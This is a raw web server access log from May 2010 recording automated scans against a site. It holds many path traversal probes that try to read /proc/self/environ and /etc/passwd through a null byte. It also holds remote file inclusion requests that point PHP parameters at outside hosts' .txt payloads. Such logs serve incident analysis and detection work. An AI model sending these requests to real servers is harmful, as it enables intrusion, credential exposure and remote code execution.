94.23.20.123 - - [24/May/2010:01:49:15 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
94.23.20.123 - - [24/May/2010:01:49:15 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.20.123 - - [24/May/2010:01:49:15 -0500] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
82.76.12.197 - - [24/May/2010:01:50:56 -0500] "GET /logs/index.php?option=com_webtv&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
82.76.12.197 - - [24/May/2010:01:50:56 -0500] "GET /index.php?option=com_webtv&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
187.45.193.159 - - [24/May/2010:01:51:05 -0500] "GET //index.php?option=com_myblog&item=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
187.45.193.159 - - [24/May/2010:01:51:29 -0500] "GET //index.php?option=com_myblog&item=12&taks=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
207.46.195.226 - - [24/May/2010:01:51:31 -0500] "GET /logs/access_log.1198022400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
217.73.226.100 - - [24/May/2010:01:53:58 -0500] "GET //?board_skin_path=http://christenplein.com/id1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
217.73.226.100 - - [24/May/2010:01:53:58 -0500] "GET /logs//?board_skin_path=http://christenplein.com/id1.txt?? HTTP/1.1" 200 6786 "-""Mozilla/5.0"
217.73.226.100 - - [24/May/2010:01:53:58 -0500] "GET /logs/access_log.1270598400//?board_skin_path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
69.168.54.22 - - [24/May/2010:01:54:01 -0500] "GET /logs/access_log.1273363200/TotalCalendar_2../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 381 "-""libwww-perl/5.805"
69.168.54.22 - - [24/May/2010:01:54:01 -0500] "GET /TotalCalendar_2../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 354 "-""libwww-perl/5.805"
69.168.54.22 - - [24/May/2010:01:54:01 -0500] "GET /logs/TotalCalendar_2../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 359 "-""libwww-perl/5.805"
87.106.167.211 - - [24/May/2010:01:57:22 -0500] "GET /logs/access_log.1273363200/TotalCalendar_2../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 381 "-""libwww-perl/5.805"
87.106.167.211 - - [24/May/2010:01:57:23 -0500] "GET /TotalCalendar_2../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 354 "-""libwww-perl/5.805"
87.106.167.211 - - [24/May/2010:01:57:23 -0500] "GET /logs/TotalCalendar_2../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 359 "-""libwww-perl/5.805"
222.236.47.182 - - [24/May/2010:01:57:54 -0500] "GET /logs/access_log.1271548800//administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=http://mpress.com.ua///templates/zfxid1.txt??? HTTP/1.1" 404 378 "-""Mozilla/5.0"
222.236.47.182 - - [24/May/2010:01:57:54 -0500] "GET //administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=http://mpress.com.ua///templates/zfxid1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
222.236.47.182 - - [24/May/2010:01:57:55 -0500] "GET /logs//administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=http://mpress.com.ua///templates/zfxid1.txt??? HTTP/1.1" 404 356 "-""Mozilla/5.0"
74.54.52.210 - - [24/May/2010:01:59:20 -0500] "GET /logs/access_log.1273363200/TotalCalendar_2../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 381 "-""libwww-perl/5.810"
74.54.52.210 - - [24/May/2010:01:59:20 -0500] "GET /TotalCalendar_2../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 354 "-""libwww-perl/5.810"
74.54.52.210 - - [24/May/2010:01:59:20 -0500] "GET /logs/TotalCalendar_2../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 359 "-""libwww-perl/5.810"
137.118.32.10 - - [24/May/2010:01:59:57 -0500] "GET /logs/bbcode_inputs.php?layout=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 306 "-""libwww-perl/5.831"
137.118.32.10 - - [24/May/2010:01:59:57 -0500] "GET /bbcode_inputs.php?layout=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-""libwww-perl/5.831"
208.66.64.71 - - [24/May/2010:02:00:03 -0500] "GET /logs/bbcode_inputs.php?layout=../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 306 "-""libwww-perl/5.808"
208.66.64.71 - - [24/May/2010:02:00:03 -0500] "GET /bbcode_inputs.php?layout=../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-""libwww-perl/5.808"
91.215.216.30 - - [24/May/2010:02:00:12 -0500] "GET //?board_skin_path=http://www.artistcollabo.com/MAIN/images/zfxid1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
91.215.216.30 - - [24/May/2010:02:00:12 -0500] "GET /logs/access_log.1270598400//?board_skin_path=http://www.artistcollabo.com/MAIN/images/zfxid1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
91.215.216.30 - - [24/May/2010:02:00:12 -0500] "GET /logs//?board_skin_path=http://www.artistcollabo.com/MAIN/images/zfxid1.txt? HTTP/1.1" 200 6786 "-""Mozilla/5.0"
217.149.52.7 - - [24/May/2010:02:01:46 -0500] "GET /logs/?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6781 "-""libwww-perl/5.833"
217.149.52.7 - - [24/May/2010:02:01:46 -0500] "GET /logs/?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6781 "-""libwww-perl/5.833"
217.149.52.7 - - [24/May/2010:02:01:47 -0500] "GET /?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.833"
217.149.52.7 - - [24/May/2010:02:01:47 -0500] "GET /?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.833"
87.250.255.243 - - [24/May/2010:02:01:49 -0500] "GET /logs/access_log.1161216000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
210.109.108.186 - - [24/May/2010:02:02:14 -0500] "GET ///projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.79"
210.109.108.186 - - [24/May/2010:02:02:14 -0500] "GET ///projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.79"
210.109.108.186 - - [24/May/2010:02:02:14 -0500] "GET ///projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.79"
210.109.108.186 - - [24/May/2010:02:02:16 -0500] "GET ///projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.79"
137.118.32.10 - - [24/May/2010:02:02:40 -0500] "GET /logs/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
137.118.32.10 - - [24/May/2010:02:02:40 -0500] "GET /index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
82.76.12.197 - - [24/May/2010:02:02:45 -0500] "GET /index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
75.25.154.162 - - [24/May/2010:02:02:50 -0500] "GET /index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
91.186.27.166 - - [24/May/2010:02:02:51 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
91.186.27.166 - - [24/May/2010:02:02:51 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
173.45.109.10 - - [24/May/2010:02:03:04 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://bikini-eshine.com/bmz_cache/baner.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
173.45.109.10 - - [24/May/2010:02:03:04 -0500] "GET /logs/access_log.1271548800//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://bikini-eshine.com/bmz_cache/baner.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
173.45.109.10 - - [24/May/2010:02:03:04 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://bikini-eshine.com/bmz_cache/baner.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0"
208.66.64.71 - - [24/May/2010:02:04:03 -0500] "GET /logs/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.808"
208.66.64.71 - - [24/May/2010:02:04:03 -0500] "GET /index.php?option=com_ccnewsletter&controller=../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
94.23.9.198 - - [24/May/2010:02:04:10 -0500] "GET /logs/index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.9.198 - - [24/May/2010:02:04:11 -0500] "GET /index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
74.55.12.146 - - [24/May/2010:02:04:27 -0500] "GET /logs/?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6781 "-""libwww-perl/5.834"
74.55.12.146 - - [24/May/2010:02:04:27 -0500] "GET /?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
74.55.12.146 - - [24/May/2010:02:04:27 -0500] "GET /logs/?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6781 "-""libwww-perl/5.834"
74.55.12.146 - - [24/May/2010:02:04:27 -0500] "GET /logs/?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6781 "-""libwww-perl/5.834"
74.55.12.146 - - [24/May/2010:02:04:27 -0500] "GET /?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
74.55.12.146 - - [24/May/2010:02:04:27 -0500] "GET /?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
74.55.12.146 - - [24/May/2010:02:04:30 -0500] "GET /logs/?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6781 "-""libwww-perl/5.834"
74.55.12.146 - - [24/May/2010:02:04:30 -0500] "GET /?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
196.35.158.182 - - [24/May/2010:02:04:32 -0500] "GET /logs/access_log.1273363200/TotalCalendar_2../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 381 "-""libwww-perl/5.834"
196.35.158.182 - - [24/May/2010:02:04:32 -0500] "GET /TotalCalendar_2../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 354 "-""libwww-perl/5.834"
196.35.158.182 - - [24/May/2010:02:04:32 -0500] "GET /logs/TotalCalendar_2../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 359 "-""libwww-perl/5.834"
91.186.27.166 - - [24/May/2010:02:04:34 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
222.236.47.182 - - [24/May/2010:02:04:34 -0500] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://mpress.com.ua///templates/zfxid1.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
91.186.27.166 - - [24/May/2010:02:04:34 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
91.186.27.166 - - [24/May/2010:02:05:39 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
91.186.27.166 - - [24/May/2010:02:05:39 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
91.186.27.166 - - [24/May/2010:02:06:29 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
91.186.27.166 - - [24/May/2010:02:06:29 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
87.250.255.243 - - [24/May/2010:02:08:20 -0500] "GET /logs/access_log.1173830400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
91.215.216.34 - - [24/May/2010:02:09:21 -0500] "GET /logs//index.php?option=com_juser&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
91.215.216.34 - - [24/May/2010:02:09:22 -0500] "GET //index.php?option=com_juser&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
82.76.12.197 - - [24/May/2010:02:11:12 -0500] "GET /logs/firstvisit.php?lang_global=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-""libwww-perl/5.831"
82.76.12.197 - - [24/May/2010:02:11:12 -0500] "GET /firstvisit.php?lang_global=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
87.250.255.243 - - [24/May/2010:02:12:09 -0500] "GET /logs/access_log.1196121600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
82.76.12.197 - - [24/May/2010:02:12:41 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
82.76.12.197 - - [24/May/2010:02:12:41 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
75.25.154.162 - - [24/May/2010:02:13:32 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
75.25.154.162 - - [24/May/2010:02:13:32 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
222.236.47.182 - - [24/May/2010:02:14:25 -0500] "GET /logs/access_log.1271548800//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://mpress.com.ua///templates/zfxid1.txt??? HTTP/1.1" 404 369 "-""Mozilla/5.0"
222.236.47.182 - - [24/May/2010:02:14:25 -0500] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://mpress.com.ua///templates/zfxid1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
72.55.146.200 - - [24/May/2010:02:15:13 -0500] "GET /logs/access_log.1223683200//administrator/index.php?mosConfig_absolute_path=http://www.agio.it/zero100/id.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
72.55.146.200 - - [24/May/2010:02:15:13 -0500] "GET //administrator/index.php?mosConfig_absolute_path=http://www.agio.it/zero100/id.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
72.55.146.200 - - [24/May/2010:02:15:13 -0500] "GET /logs//administrator/index.php?mosConfig_absolute_path=http://www.agio.it/zero100/id.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
84.40.30.37 - - [24/May/2010:02:15:52 -0500] "GET /error.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
84.40.30.37 - - [24/May/2010:02:15:52 -0500] "GET /logs/access_log.1271548800/error.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
84.40.30.37 - - [24/May/2010:02:15:52 -0500] "GET /logs/error.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
84.40.30.37 - - [24/May/2010:02:15:54 -0500] "GET /error.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
84.40.30.37 - - [24/May/2010:02:15:55 -0500] "GET /logs/error.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
84.40.30.37 - - [24/May/2010:02:15:55 -0500] "GET /logs/access_log.1271548800/error.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.182 - - [24/May/2010:02:16:12 -0500] "GET /logs/access_log.1264118400//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://mpress.com.ua///templates/zfxid1.txt??? HTTP/1.1" 404 369 "-""Mozilla/5.0"
87.250.77.10 - - [24/May/2010:02:17:29 -0500] "GET //index.php?basedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-"""
87.250.77.10 - - [24/May/2010:02:17:29 -0500] "GET //index.php?basedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-"""
87.250.77.10 - - [24/May/2010:02:17:29 -0500] "GET //index.php?basedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-"""
87.250.77.10 - - [24/May/2010:02:17:30 -0500] "GET /logs//index.php?basedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-"""
87.250.77.10 - - [24/May/2010:02:17:30 -0500] "GET /logs//index.php?basedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""